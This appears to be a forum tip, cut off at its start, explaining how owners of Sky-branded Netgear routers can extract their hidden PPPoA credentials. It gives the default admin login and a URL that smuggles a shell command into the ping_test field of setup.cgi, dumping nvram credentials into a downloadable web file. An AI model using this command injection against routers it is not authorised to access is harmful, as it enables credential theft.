who want to find their hidden ADSL username & password so they can bin the nobbled Netgear router...
First login to your router's admin page at 192.168.0.1
Username admin password sky
Next, paste this URL into the address bar and hit enter http://192.168.0.1/setup.cgi?todo=ping_test&c4_IPAddr=%26/bin/grep+ppoa_+/tmp/nvram+%3E+/www/netgear.cfg
This assumes you haven't changed the IP address
You'll get a message about ping useage appear - ignore it.
Now paste this into the address bar and hit enter
http://192.168.0.1/netgear.cfg
Save the file somewhere, then view it with notepad/wordpad etc
You will see PPPOA username & password right at the front, so you can now use your router of choice
